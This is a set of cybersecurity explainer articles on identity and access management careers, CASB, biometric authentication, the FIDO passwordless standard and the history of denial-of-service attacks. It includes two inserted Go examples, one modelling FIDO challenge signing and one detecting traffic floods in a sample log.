According to a Verizon investigation, more than 4 billion digital records were exposed in the first half of 2019 alone. Most breaches that involved hacking were due to weak or compromised user credentials. Most hacks occurred at the password level.

Is identity and access management part of IT or cybersecurity? As cybercrime became more frequent and more sophisticated, IAM gradually became a distinct discipline with a wider gap from IT.

With cloud technology, mobility and remote jobs on the rise, information technology professionals have less control over workers’ access to sensitive data. Even worse, the sprawl of user identities often extends to partners, contract workers, customers and vendors.

User groups at various levels need their own set of requirements and restrictions. Not only that, but users are signing in from a range of devices such as smartphones, laptops and tablets. Every time a user logs in, onboards, offboards, resets a password or changes jobs within a company, sensitive data is put at risk.

That’s where identity and access management, or IAM, comes in. This highly specialized offshoot of IT focuses more narrowly on cybersecurity.

IAM professionals primarily ensure that only authorized programs, users and devices are connected to one another. They manage ever-changing user identities as users come and go. They authenticate all users and allow or disallow access at every point of entry. When employees leave a company, credentials are immediately removed.

IAM systems even create behavior baselines to reflect typical usage. For instance, if a location or device is out of the ordinary for a specific user, IAM notices.

In short, IAM provides an extra layer of security that no business, large or small, can function without these days. Worldwide, cybercrime costs are expected to reach $6 trillion annually through 2021. Businesses are vulnerable to monetary theft, theft of intellectual property, data destruction, personal identity theft, fraud, a damaged reputation and a host of other evils.

There are other benefits in addition to enhanced security. A centralized IAM platform saves time, man-hours and costs because it’s all automated. Administrators don’t have to manually grant permission each time a user wants to access a database, network or application.

Also, governments and industries are getting stricter all the time with security and privacy regulations. IAM enforces policies and closely monitors compliance, which could save companies millions of dollars in fines.

For all those reasons, more and more businesses are creating IAM teams. Skilled IAM professionals are in hot demand.

IT or Security?

In its infancy, IAM was usually a small, specialized department functioning under the overall IT strategy. IAM team members traditionally reported to the chief information officer.

As cybercrime became more frequent and more sophisticated, IAM gradually became a distinct discipline. The gap between IT and IAM seems to be getting even wider.

Many longtime IT professionals are simply not trained in the cutting-edge technology, engineering, software development and security improvements that are vital to strong IAM.

In big corporations that can afford a larger security staff and a chief security officer, IT directors have less and less to do with identity strategies. Many IT departments these days have no ownership at all over IAM, and IAM employees report to the CSO.

CSOs are more intimately familiar with internal controls requirements, threat and risk management processes, and cybercrime prevention strategies. CIOs are typically more outward-facing, technology focused, and less concerned with security than a CSO would be.

In smaller companies, the lines get somewhat blurrier, and who reports to whom really depends on how things are structured. Some smaller firms merge two executive jobs; CIO and CSO become CISO, or chief information security officer.

At any rate, IAM largely functions under the security category.

A Fast-growing Career With Diverse Opportunities

It’s estimated that half a million specialists are needed in the cybersecurity sector. That’s just in the U.S.

Unlike other specialized fields, such as nuclear medicine or aerospace engineering, IAM has opportunities across countless sectors and industries. Who doesn’t need first-rate cybersecurity?

Every day, IAM is being designed and implemented for medical settings, banks, universities, government agencies, real estate firms, insurance companies, human resources departments, software companies and retail stores. Businesses from startups to major corporations seek top talent.

That gives job seekers in IAM numerous choices that they wouldn’t have in other fields.

Jobs in IAM

There are both technical and nontechnical jobs in this burgeoning field.

Strong technical skills are needed in system design, architecture and engineering; implementation; database and operating system management; system integration; software development; and programming.

Nontechnical jobs include project planning and management, risk assessment, identity management training, compliance, auditing, data analysis, advisory and consulting.

These are some of the most popular jobs:

  • System architect
  • System engineer
  • Administrator
  • Access control specialist
  • Data protection specialist
  • Identity protection adviser

Most require a bachelor’s degree in a computer-related field and job-specific certifications. A strong background in IT is a great launching pad for technical IAM roles. However, nontechnical IAM professionals such as governance experts, auditors, risk managers, process re-engineering staff, compliance professionals, data protection officers and identity theft protection advisors also contribute greatly to the IAM field with their diverse professional backgrounds and experience.

There are enough jobs to go around at just about every level, and salaries range anywhere from $35,000 to $200,000. IAM is an ideal career for creative types with extensive computer knowledge.

Identity and Access Management Certifications

Identity Management Institute offers distinct identity management certifications for each set of inter-related IAM roles listed above and others.

Cloud computing has allowed companies and their employees to easily store, access, share, and work with others across the globe and within different geographical areas. In today’s digital world, almost 96% of organizations leverage cloud solutions to support their day to day business operations. However, conducting business in the cloud requires a different cybersecurity approach for ensuring data security than traditional network security methods. Cloud Access Security Broker (CASB) offers a solution to ensure security of applications and data in cloud environments.

Cloud Access Security Broker (CASB) is a cloud security solution that helps organizations control access, reinforce policies, and protect data in the cloud.

What Is CASB?

CASB is on-premises or cloud-based security software that sits between businesses and cloud service providers. It enforces compliance, security, and governance policies for cloud services. CASB involves several security controls, such as single sign-on, authentication, authorization, device profiling, credential mapping, and encryption. Moreover, you can apply other strategies, including alerting, logging, tokenization, malware detection, and prevention to further expand cybersecurity capabilities.

The term CASB was coined by Peter Firstbrook and Neil MacDonald of Gartner in 2011. However, Gartner did not publish the industry’s first CASB quadrant until 2017.

CASB Purpose

Cloud access security broker is an essential aspect of cloud security. It is crucial for companies that want to have secure cloud usage in their enterprises. Since its inception, CASB services have evolved to work with other IT security services and support IT operations such as monitoring the cloud service usage for budgeting purposes.
If you are using cloud services, it is critical that you consider incorporating CASB as part of your cybersecurity strategy. With proper CASB deployment, you can easily add other security controls to protect your data as it moves between devices and cloud service providers. Although CASB is not mandatory for all businesses, it is critical for maintaining security as cloud usage grows, and it acts as a default solution for security compliance, including privacy regulations such as the General Data Protection Regulation (GDPR).

CASB Services

CASB offers four primary security services, including visibility, compliance, data security, and threat protection. Before settling for a specific CASB solution, ensure that it meets your needs in these categories.

Visibility
It is essential to know who is using cloud services and for what purpose. With that said, most companies with cybersecurity teams and capabilities are lacking visibility in this area. With CASB services, an organization can monitor both authorized and unauthorized cloud access by employees and others. Initially, companies allowed their employees only to use their work computers to access cloud services. However, increasingly workers are allowed to connect their personal devices like smartphones to access the organization’s cloud services. CASB can effectively monitor cloud activities and raise alerts.

Compliance
Compliance with data privacy laws is very crucial because privacy is the most significant right of consumers. Therefore, even a minor violation can lead to a lawsuit. As a regulated company, you need auditing and reporting tools to show data security compliance. CASB solutions provide Data Loss Prevention (DLP) and other policy controls that enforce various compliance requirements including HIPAA, PCI, and many more.

Data security
With various data stored in the cloud, CASB identifies and categorizes some as sensitive, thereby applying appropriate Data Loss Prevention policies like tokenization, encryption, or data masking for added protection. Even when the information is downloaded, the encryption stays on to prevent data exfiltration. CASB provides access control for the browser, operating system, location, IP address, and device.

Threat Protection
Another crucial function of CASB is protecting cloud services from unsanctioned applications. It does this through behavior analytics in real-time and anomaly detection. With new threats, effective protection is introduced such as anti-phishing protection, predictive malware technologies, and account-takeover detection.

Benefits of CASB

Identifying unauthorized access
Security is a requirement for any organization. Although many employees and organizations prefer to access cloud services from various devices and locations, this capability carries high security risks. With limited security solutions such as a firewall-only setup, data cannot be adequately protected from threats. Comprehensive CASB solutions resolve this by scrutinizing access and protecting data from unauthorized devices and potential threats.

Access control
CASB monitors cloud security by offering full visibility for every user’s behavior in real-time. It further neutralizes the issue by taking necessary action in case of a threat.

Reporting
Aside from acting as a cloud security gatekeeper, CASB reports any suspicious activities. It is also practical in auditing and reporting organizations’ overall operations, hence improving their security structure. By monitoring traffic on cloud services, management can be on the lookout for policy violations.
If your company possesses confidential data and leverages cloud services for data sharing and storage, then the CASB solution is necessary in providing absolute control over data.

CASB Deployment Methods

The primary function of CASB is to provide control and visibility over data and potential threats within an enterprise’s cloud. There are three principal methods to deploy CASB:

  • Reverse proxy: This method works on user devices without certificate installation or configuration changes. It does not cover unauthorized cloud usage adequately.
  • Forward proxy: This manages all traffic from endpoints, including traffic to unsanctioned cloud services. However, it does not manage user-owned devices.
  • API mode: It works well with consumer-owned devices and further allows organizations to perform functions such as policy visibility and control, logging, and data security inspection within a cloud service. Although it has no single point of failure, not all cloud services offer API support.

CASB Implementation Considerations

When an enterprise wants to use CASB, there should be a governance workflow to help streamline the implementation of the new cloud services, improve IT in managing cloud services of the company, and minimize the risk of data loss.

Below are the steps of CASB implementation:

Getting Visibility to The Existing Cloud Usage
When CASB is introduced to the current cloud usage of a company, it analyzes web traffic logs while comparing the data to its cloud registry. This stage provides visibility into all of the company’s cloud services and the associated risks.
When looking for CASB solutions, enterprises should ensure that the CASB has a comprehensive cloud registry for maximum visibility. Also, companies should ensure that the CASB tokenizes sensitive data such as IP addresses and user IDs before uploading any web traffic logs for analysis.

Building A Cloud Risk Model
CASB provides detailed insight into every cloud service by maintaining and regularly updating its complete signatures. A robust cloud risk model consists of a comprehensive and accurate CASB registry, with attributes verified by an industry authority.

Applying The Risk Model to The Existing Shadow Cloud Service
This is the stage where a company uses CASB to enforce acceptable use policies. IT can classify services into categories such as permitted/approved/denied based on the risk assessment provided in the first stage. From there, CASB introduces preventive measures to the existing firewall.

Developing A Cloud Service Onboarding Process
With the cloud risk model in place, a company can use CASB to streamline its onboarding process for new cloud services. This dramatically reduces the work of the IT department, since it relies on CASB to grant or deny access to cloud services.

What Are The CASB Policies and Standards?

Here are three central policies that most CASB solutions offer, depending on your needs and industry:

Access Control
CASB offers a range of variables to manage access control for managed versus unmanaged devices. Access from an unmanaged device presents a higher risk than access from an authorized device. As a result, access from an unmanaged device must be more restricted. Restricting access from unsanctioned devices helps cloud security by eliminating the potential threat that comes with them. CASB can block sensitive information from being accessed by unauthorized users in real time.

Mobile Data Protection
The biggest problem facing organizations is what happens to sensitive data when it is synchronized or downloaded to thousands of employees’ devices, whether authorized or unauthorized. CASB ensures that your mobile cloud data is safe by providing security functions such as encryption, PIN codes, rights management when downloading data, and selective wiping of corporate data.

External Sharing
If a company’s cloud apps contain a sharing component, the CASB solution looks for sensitive data, scans it, and identifies any external shares. All publicly shared files that contain credit card data or other sensitive personal data can be quarantined until an evaluation is done to ensure the share is required and legitimate.

Final Remarks

CASB has rapidly evolved to become a necessity in cloud security management in any industry that leverages cloud services to store and share data. CASB solutions are increasingly deployed in numerous leading enterprises to provide visibility, data control, compliance, and threat protection.


Hackers have become bolder and more sophisticated than ever before. Millions of business entities worldwide, both big and small, have fallen victim to malware and ransomware attacks with devastating results. This, coupled with the risk of escalating attacks in the foreseeable future, is prompting companies to switch to biometric authentication technology.

Biometric authentication for better security keeps hackers at bay and users happy. This case study makes the argument for transition to biometric authentication.

This article will review companies’ transition to biometric authentication technology in detail. Most importantly, it will help you decide whether or not to switch to biometric authentication for better security.

How Many Companies Have Transitioned?

Several studies confirm that the majority of companies have already transitioned to biometric authentication technology. One such study, conducted in 2018 by Spiceworks, reported that about 62% of companies had already adopted the technology toward the end of 2018. The report further estimated that 90% of all companies would adopt the technology by the end of 2020.

Different companies have adopted varying methods of biometric authentication. Available methods range from basic fingerprint scans to sophisticated AI-powered behavioral analysis, and it seems that most companies have opted for the simpler methods, according to multiple reports.

Fingerprint scanning is the most popular method of biometric authentication, and it is currently in use by 57% of all respondents. Facial scanning and recognition come second with a general usage rate of about 14% of all respondents. Other biometric authentication methods in use include:

• Hand Geometry Recognition (5%)
• Iris Scanning Technology (3%)
• Voice Recognition (2%)
• Palm-Vein Recognition (2%)

It is worth noting that these biometric security measures are not sufficient to guarantee impenetrable security, considering the statistics. Cybersecurity experts have warned that certain forms of biometric security are vulnerable to attacks – already, more than one million people have had their fingerprint and facial recognition data compromised.

Still, biometric authentication is widely considered the safest and most secure form of authentication. Following is an overview of why this is the case.

Making a Case for Biometric Authentication for Businesses

There is a reason why so many companies have transitioned to biometric authentication in such a short period: they trust it to keep hackers at bay. That’s not all – following is an overview of some of the top reasons for the mass transition to biometric authentication:

1. Accuracy

Biometric security is the most accurate form of digital security yet. It makes use of personal physiological traits that are hard to duplicate, unlike passwords and PINs that anyone can access and use without detection.
For example, fingerprint scanning, which is considered one of the basic methods of biometric authentication, is highly accurate because no two fingerprints are alike. The stakes are raised when it comes to other forms of biometric authentication, such as iris scans and AI-powered behavioral recognition.

So, why do some reports suggest that many people have had their biometric data compromised? First, some biometric security systems are better than others. Second, laxity in other security components can give hackers the opportunity to steal sensitive cyber-security data.

2. Efficiency

In addition to better security, biometric authentication systems also make it easier to streamline operations in various sectors of the company. For example, employees with the relevant authorization can get easier and quicker access to different parts of the building without having to swipe access cards every time. Additionally, the extra component of activity tracking makes it easier to collect performance data and calculate payroll.

3. Accountability

As mentioned, one other key component of biometric authentication security is tracking activities. For example, the system can track when employees check in and check out, how much work they turn in, their turnaround times, and more. All of this data helps to gauge employees’ productivity and hold them accountable. It also comes in handy when formulating a strategy to ensure efficiency around the workplace and ultimately improve overall productivity.

4. Convenience

Operating based on a biometric authentication system is easier and more convenient for everyone involved. Consider employees; for example, it is common for employees to lose or forget their access cards or passwords. In such cases, the employees have to go through extensive security checks to regain clearance, a process that takes up a lot of time and other resources. This is not the case with biometric authentication since the defining security clearance traits are physiological.

Biometric authentication systems are also convenient for employers and the people responsible for security. These systems, despite their complex nature, are easy and quick to implement. Some training is required, but most of the controls are intuitive and easy to understand.

5. Scalability

Biometric authentication systems are scalable in more ways than one. For example, you can use different versions of the system for different purposes. This applies to companies with a large workforce with varying security clearances. In this case, you can use simple facial and fingerprint authentication systems for low-level clearance access and reserve the more complex methods for high-level clearance access.

More importantly, biometric authentication systems are designed to grow with the company’s growing needs. The system is powered by AI and digital technologies, so the potential for expanding is great. Your company will not need to install additional components in case it needs to clear more employees, at least not as much as compared to conventional security systems.

6. Cost-Saving & Profitability

As mentioned, you don’t need to buy or install additional components when upgrading your biometric authentication security system. The system also requires less maintenance compared to alternative conventional security systems. As such, you will be looking to save substantial costs in the long run. The security assurances that come with this system will also prevent potentially significant losses in case of a successful breach of security.

Implementation – The Process and Common Challenges

Biometric authentication is a much simpler concept today than it was in the past. Installation and implementation of these systems, however, is a topic best left to trained technical experts. At a glance, however, it is a two-phase process.

First, the technicians will come in and install all the necessary hardware: this basically includes sensors, cameras, scanning devices, and screens, depending on the extent of your security system. The second phase involves the installation of the necessary software to power the system. This coincides with the collection of users’ biometric data, such as taking fingerprints, making iris scans, and modeling personal behavioral traits.

The process is not as smooth as it sounds, however, as some challenges may arise during installation and implementation. Common documented challenges include:

1. Legal Hurdles

Biometric security systems have some serious implications for privacy and regulatory compliance in some states and countries. In the U.S., for example, several states, including Texas, Illinois, California, New York, and Washington, have certain privacy laws that will hamper the full implementation of biometric security systems in the retail sector.

2. Data Breach Threat

Biometric authentication is highly accurate when properly implemented and used. However, it relies on stored data, just like every other security system. This data has to be stored somewhere, and it is vulnerable to hacking when in storage; as mentioned, hackers have already demonstrated that they can do it.

3. Potential for System Failure

Biometric authentication security systems are characterized by efficiency, but they can also fail in case the central power source gives out for any reason. The implications for such a situation would be immense, and they would potentially disrupt all operations; this is why it is advisable to have a back-up or fail-safe security program in place.

What Do Users Have to Say?

The public has embraced biometric authentication security rather well. Several research reports, including those by Ipswitch and Veridium, find that the majority of people prefer biometric security to conventional forms of security. The Veridium poll reports that about 40% of consumers are already using fingerprint reader technology, and another 52% are willing to transition to some form of biometric authentication.

The poll also reveals that 80% of all respondents believe that biometric security is more secure than the common alternatives. However, security is only one of the reasons why more people are switching. According to the poll, 35% of respondents prefer biometric systems because of their speed and 33% because of their convenience.

Millions of smartphone users around the world have already adopted biometric authentication measures for their mobile devices; the two popular authentication methods are fingerprint scanning using a built-in scanner and facial recognition software using the phone’s camera and a secondary application. Homeowners are also installing these security systems because of the added security they promise, not to mention the convenience of not having to carry keys everywhere.

Transitioning Out of Necessity

If the recent worldwide hacking attacks have taught us anything, it is that hackers will not relent. As a business, transitioning to biometric authentication security systems should not be an option that you shelve – now is the time to do it before hackers initiate another attack and hold your systems hostage.

There is nothing to lose – implementation is easy, the systems are user-friendly, and you will save a lot of money in the long run and enjoy the security assurances you need to forge ahead.


Passwords are among the least costly security mechanisms for applications and systems. They are usually free and built into many information technologies. They are easy to use, and technical staff are familiar with how to set them up. While passwords are better than having no authentication mechanism at all, they have significant flaws, which are discussed below.

The Fast Identity Online or FIDO standard is a joint development by the world’s leading technology companies that aims to strengthen the security of systems, mobile devices and applications through strong authentication.

In 2018, an estimated five million hacked passwords were on sale on the Dark Web. Passwords are among the most common cybersecurity problems. They are often easy to break which allows unauthorized users to access business information and systems, employee e-mails, consumer accounts, and other online platforms. “123456” and “password” continue to be the two most utilized passwords, demonstrating a widespread disregard for security by many Internet and system users.

Complex Password Challenges

For passwords to be effective and serve their intended purpose, they must include letters, numbers, and symbols, which in itself is a major problem. While creating a complex password is easy, remembering such passwords is often difficult or impossible. Users who are frustrated with constantly resetting their forgotten passwords finally give in and create a simple password that they can remember and use across many systems, which is welcomed by hackers looking for easy ways to breach systems.

Using Passwords Across Multiple Systems

As mentioned, another problem is that people often reuse passwords across multiple websites and systems. Therefore, a data breach at one organization can have a ripple effect impacting security across other websites and social media platforms. People are often susceptible to phishing schemes whereby cyber criminals pose as legitimate organizations and institutions and ask users to provide them with log-in credentials.

Password Cracking

Password cracking technology has also become more sophisticated, allowing people to crack passwords more quickly. In 20 years, the average length of a password is projected to increase by two characters, while computing power is expected to increase exponentially. Currently, 54% of passwords are only three to six characters in length, making them easy targets for cracking. This is driving the push to find alternative methods of authentication.

Default Passwords

Too many people are using default or common passwords that were programmed into the device or application leaving them vulnerable to cybercriminals. For every twenty passwords, one is being shared with another person or multiple users. Retaining default passwords can jeopardize the cybersecurity of an entire organization or business.

Additionally, while it is helpful that password expirations are becoming more common, people often revert their passwords to minor variations of previously used passwords. This creates a false sense of security, especially when there is a history of data breaches and people make only slight changes to existing credentials.

What is the FIDO (Fast Identity Online) Standard?

The Fast Identity Online or FIDO standard is a joint development by the world’s leading technology companies that aims to strengthen the security of systems, mobile devices and applications through strong password-less authentication. FIDO passwordless authentication allows users to sign in to their platform or system without a username or password, using an external security key or a platform key built into a device. FIDO aims to replace the use of susceptible passwords for authentication with more secure biometric authentication reinforced by cryptography.

The biometric systems that FIDO plans to utilize include fingerprints and facial recognition. This will be combined with second-factor and multi-factor authentication which will provide layers of verification which will be far more difficult to break. The integration of these two authentication alternatives will provide an easier and more secure way to identify authorized users.

How does FIDO Fast Identity Online Work?

When users register with a platform, application, or system that uses FIDO, the device creates a cryptographic key pair: the private key remains on the device, while the public key is registered with the online platform or system. To verify their identity, the user demonstrates possession of the private key by responding to a challenge issued by the service, which checks the response with the registered public key.

The private key can only be used once the user has unlocked the local device or the hardware of the device they are using. This can be done through voice, a secure PIN, inserting a second-factor device, or a fingerprint. This process protects the user’s credentials and privacy, providing more security with minimally invasive techniques. The standard does not provide data that applications and platforms can use to track user activity. Biometric information is also never shared; it remains on the user’s local device.

Why Use FIDO Instead of Passwords

FIDO authentication standards are based on public-key cryptography which provides authentication that is more secure than passwords. Additionally, consumers and workplaces are gaining increased security without placing time barriers on the user experience. People are finding FIDO authentication standards easier to use while platforms and applications are easier to manage. It reduces the likelihood of accounts being hacked, and reduces the likelihood that a single data breach will affect multiple systems and organizations.

FIDO Alliance Members

The FIDO Alliance's members are technology leaders from around the world, including government agencies, healthcare companies, telecommunications companies and corporations. The alliance is driven by the mission to find alternatives to passwords and reduce reliance on them. These diverse partners work together to develop common standards, collaborate on best practices for FIDO authentication, and generate global awareness of the benefits of adhering to FIDO standards. A full list of board-level, sponsor-level, government and associate-level members is available on the FIDO Alliance's website.

FIDO Authenticator

To carry the FIDO mark, authenticator vendors must certify their products at one of the FIDO authenticator certification levels. Currently, those levels are level 1 and 1+, level 2 and 2+, and level 3 and 3+. At each successive level the requirements build on the previous level, so level 2 must meet the requirements for level 1 in addition to its own. For example, level 1 FIDO authenticators must defend against phishing and against server-side credential breaches. Level 2 must meet all level 1 requirements and also resist compromise of the device's operating system, which in practice means the keys live in a restricted environment such as a trusted execution environment or secure element rather than in the main OS.

The FIDO Alliance is currently working on software and hardware requirements for additional levels beyond level 3+. There is a stringent process by which vendors demonstrate that their implementation of the FIDO standards meets the authenticator requirements, and at the end of it qualified vendors receive a FIDO certification.

The Benefits of FIDO Authentication

The pros of FIDO are strong security, a range of secure recovery options, and resistance to phishing. FIDO passwordless authentication is secure because each sign-in signs a fresh challenge issued by the service, so a captured response cannot be replayed or redirected elsewhere. FIDO also allows users to register multiple authenticators with a service provider, so losing one key does not mean losing the account. Finally, phishing attacks are ineffective even when the user clicks a malicious link or attachment: the credential is bound to the web origin where it was registered, so a lookalike site cannot obtain a signature that the genuine site will accept. Some have suggested that adopting FIDO may be costly and time-consuming. However, the security gained over traditional password authentication is a game-changer.
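The registration and sign-in flow described under "How does FIDO Work?" and the phishing resistance claimed above can be seen in a few dozen lines. The following is an added example, not code from the original article or from the FIDO Alliance: a Go model in which an authenticator keeps one P-256 private key per origin and signs a server challenge bound to that origin, and a relying party stores only public keys. The hashing of origin and challenge is a simplified stand-in for WebAuthn's client data structure, and the origins and user names are assumptions.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Authenticator stands in for a security key or platform authenticator: one
// private key per relying-party origin, never exported, and unusable until the
// local user-verification step (PIN or biometric, modelled as a bool) succeeds.
type Authenticator struct {
	unlocked bool
	keys     map[string]*ecdsa.PrivateKey // origin -> private key, never leaves the device
}

func NewAuthenticator() *Authenticator {
	return &Authenticator{keys: map[string]*ecdsa.PrivateKey{}}
}

// Unlock models the PIN or fingerprint check; only its result leaves the device.
func (a *Authenticator) Unlock(verified bool) { a.unlocked = verified }

// Register mints a fresh key pair scoped to one origin and returns only the
// public half for the relying party to store.
func (a *Authenticator) Register(origin string) (*ecdsa.PublicKey, error) {
	if !a.unlocked {
		return nil, errors.New("authenticator locked: user verification required")
	}
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	a.keys[origin] = priv
	return &priv.PublicKey, nil
}

// Assert signs the challenge together with the origin the browser reports it
// is talking to; a lookalike origin has no key and gets no usable signature.
func (a *Authenticator) Assert(origin string, challenge []byte) ([]byte, error) {
	if !a.unlocked {
		return nil, errors.New("authenticator locked: user verification required")
	}
	priv, ok := a.keys[origin]
	if !ok {
		return nil, errors.New("no credential registered for " + origin)
	}
	return ecdsa.SignASN1(rand.Reader, priv, signedData(origin, challenge))
}

// signedData binds challenge to origin (simplified layout, not WebAuthn's encoding).
func signedData(origin string, challenge []byte) []byte {
	h := sha256.New()
	h.Write([]byte(origin))
	h.Write([]byte{0}) // separator so origin and challenge cannot run together
	h.Write(challenge)
	return h.Sum(nil)
}

// RelyingParty is the server: it holds public keys only, so a database breach
// yields nothing an attacker can log in with.
type RelyingParty struct {
	Origin string
	users  map[string]*ecdsa.PublicKey
}

func NewRelyingParty(origin string) *RelyingParty {
	return &RelyingParty{Origin: origin, users: map[string]*ecdsa.PublicKey{}}
}

func (rp *RelyingParty) Enroll(user string, pub *ecdsa.PublicKey) { rp.users[user] = pub }

// NewChallenge returns 32 fresh random bytes; an old signature is worthless
// against a new challenge, which is what defeats replay.
func (rp *RelyingParty) NewChallenge() ([]byte, error) {
	c := make([]byte, 32)
	_, err := rand.Read(c)
	return c, err
}

// Verify checks against the relying party's own origin, never the one the client claims.
func (rp *RelyingParty) Verify(user string, challenge, sig []byte) bool {
	pub, ok := rp.users[user]
	if !ok {
		return false
	}
	return ecdsa.VerifyASN1(pub, signedData(rp.Origin, challenge), sig)
}

// Login runs one assertion round; clientOrigin is the origin the browser actually loaded.
func Login(rp *RelyingParty, auth *Authenticator, user, clientOrigin string) (bool, error) {
	challenge, err := rp.NewChallenge()
	if err != nil {
		return false, err
	}
	sig, err := auth.Assert(clientOrigin, challenge)
	if err != nil {
		return false, err
	}
	return rp.Verify(user, challenge, sig), nil
}

func main() {
	bank := NewRelyingParty("https://bank.example")
	key := NewAuthenticator()
	key.Unlock(true)
	pub, _ := key.Register(bank.Origin)
	bank.Enroll("alice", pub)
	ok, err := Login(bank, key, "alice", bank.Origin)
	fmt.Println("genuine site:", ok, err)
	ok, err = Login(bank, key, "alice", "https://bank-login.example") // phishing page relaying the challenge
	fmt.Println("lookalike site:", ok, err)
}
```

The two properties worth noticing are that `Verify` hashes in `rp.Origin` rather than anything the client sent, and that a signature is only ever produced over a challenge the server just generated; together they are why a relayed login from a lookalike domain fails and why a recorded response cannot be replayed.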

Identity and access management certifications

There has never been a successful cyber attack that crashed the entire internet at once. That’s not to say that it can’t happen in the future, but as of yet, hackers have only been able to bring down portions of the internet at once.

Cyber Attack Methods on Internet Availability by Identity Management Institute

Denial-of-service (DoS) attacks are among the most common attacks on Internet availability. The attacker, or more often a botnet of compromised machines in a distributed denial-of-service (DDoS) attack, floods the target with far more traffic or requests than it can handle, exhausting bandwidth, connection tables or application capacity. The effect is a "wall of virtual people" that blocks legitimate users from reaching a website, portal or critical web app.
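What that wall looks like from the defender's side is a request rate, and the simplest detection is a sliding-window count. The following is an added example written for this page, not code from the original article: a Go program that parses a constructed access log (the addresses and timestamps are made up), flags any source that exceeds a per-window request limit, and also measures the aggregate peak, which is what exposes a distributed flood whose individual members each stay under the per-source limit.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// Request is one parsed access-log entry; only what rate detection needs.
type Request struct {
	At     time.Time
	Source string
}

// Flood is a source that exceeded the per-window request limit.
type Flood struct {
	Source string
	Peak   int       // most requests from this source in any one window
	Start  time.Time // start of the window in which the peak was reached
}

// ParseLog reads lines of the form "<RFC3339 time> <source IP> <method> <path> <status>"
// and skips lines that do not fit that shape.
func ParseLog(raw string) []Request {
	var out []Request
	for _, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		f := strings.Fields(line)
		if len(f) != 5 {
			continue
		}
		at, err := time.Parse(time.RFC3339, f[0])
		if err != nil {
			continue
		}
		out = append(out, Request{At: at, Source: f[1]})
	}
	return out
}

// peakInWindow sorts the timestamps and slides a half-open window [t, t+window)
// over them, returning the largest count seen and the start of that window.
func peakInWindow(times []time.Time, window time.Duration) (int, time.Time) {
	sort.Slice(times, func(i, j int) bool { return times[i].Before(times[j]) })
	peak, start, lo := 0, time.Time{}, 0
	for hi := range times {
		for times[hi].Sub(times[lo]) >= window {
			lo++ // drop requests that have fallen out of the window
		}
		if n := hi - lo + 1; n > peak {
			peak, start = n, times[lo]
		}
	}
	return peak, start
}

// DetectFloods reports every source whose count in some window exceeds limit.
func DetectFloods(reqs []Request, window time.Duration, limit int) []Flood {
	bySource := map[string][]time.Time{}
	for _, r := range reqs {
		bySource[r.Source] = append(bySource[r.Source], r.At)
	}
	var floods []Flood
	for src, times := range bySource {
		if peak, start := peakInWindow(times, window); peak > limit {
			floods = append(floods, Flood{Source: src, Peak: peak, Start: start})
		}
	}
	sort.Slice(floods, func(i, j int) bool { return floods[i].Peak > floods[j].Peak })
	return floods
}

// AggregatePeak ignores sources: a botnet whose members each stay under the
// per-source limit still shows up as a spike in total traffic.
func AggregatePeak(reqs []Request, window time.Duration) int {
	times := make([]time.Time, len(reqs))
	for i, r := range reqs {
		times[i] = r.At
	}
	peak, _ := peakInWindow(times, window)
	return peak
}

// SampleLog is constructed test data, not a real capture: one host hammering
// /login, five hosts sharing a slower flood, and one normal user.
func SampleLog() string {
	var b strings.Builder
	base := time.Date(2024, 5, 1, 10, 0, 0, 0, time.UTC)
	line := func(off time.Duration, src, method, path string, status int) {
		fmt.Fprintf(&b, "%s %s %s %s %d\n", base.Add(off).Format(time.RFC3339), src, method, path, status)
	}
	for i := 0; i < 12; i++ { // twelve failed logins in six seconds
		line(time.Duration(i/2)*time.Second, "203.0.113.7", "POST", "/login", 401)
	}
	for bot := 0; bot < 5; bot++ { // five bots, four requests each, all within eight seconds
		for i := 0; i < 4; i++ {
			line(time.Duration(bot+i)*time.Second, fmt.Sprintf("203.0.113.%d", 10+bot), "GET", "/search", 200)
		}
	}
	for _, s := range []int{0, 25, 55} { // a person browsing
		line(time.Duration(s)*time.Second, "198.51.100.4", "GET", "/home", 200)
	}
	return b.String()
}

func main() {
	reqs := ParseLog(SampleLog())
	fmt.Println("per-source floods:", DetectFloods(reqs, 10*time.Second, 8))
	fmt.Println("aggregate peak in any 10s window:", AggregatePeak(reqs, 10*time.Second))
}
```

With a limit of 8 requests per 10 seconds only the single hammering host is reported, while the five bots slip under the per-source threshold; the aggregate peak of 33 requests in one window is what gives them away, which is why production rate limiting watches both.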

An early high-profile example came in January 2001, when a misconfiguration followed by a denial-of-service attack against Microsoft's DNS servers left its sites unreachable. That July, before the 9/11 attacks, the Code Red worm infected hundreds of thousands of machines running Microsoft IIS; the researchers who analyzed it named it after the Code Red Mountain Dew they were drinking at the time. A month later, Code Red II infected tens of thousands more.

After the 9/11 attacks, the National Cyber Security Alliance, a public-private partnership, was formed to raise security awareness, and the Bush administration proposed the Department of Homeland Security in June 2002; it was established that November, with part of its mission being to boost security in critical IT sectors.

As is usual in these contests, attackers create new forms of attack faster than defenders can devise counters. In February 2020, Amazon Web Services reported the largest denial-of-service attack on record, peaking at 2.3 Tbps. Amazon was prepared, and its AWS Shield service absorbed the attack. Few targets have that kind of capacity, though, and against smaller operators the attackers generally have the upper hand.

Despite the attackers' advantage, the reason these attacks have not crashed the entire internet is that the internet is colossal, and it is not one single network: it is made up of tens of thousands of independently operated networks that exchange traffic with one another. Even the most skillful team cannot affect all of them at once with today's tools, because each network has its own topology and defences. Disrupting one network is not that difficult; disrupting the whole thing at once is, with present technology, out of reach.

Any such disruption lasts only as long as the attackers can keep up the denial-of-service pressure, or until the attacked party responds. Attackers have other options, though. Although the prospect of "bringing down the whole thing" is enticing, they have shifted tactics toward crashing the networks of businesses and government entities, with dire consequences.

They infect machines with malware that propagates itself. They disguise their intentions as "wolves in sheep's clothing" and entice people to click bad links. These attacks are far more sophisticated than the Anna Kournikova virus of two decades ago. Fortunately, computer users in the 21st century are savvier than their counterparts from the dawn of the dot-com boom, and even the least experienced have basic security on their machines. In the world of espionage, spies call their craft "the great game"; the hackers and defenders might disagree.

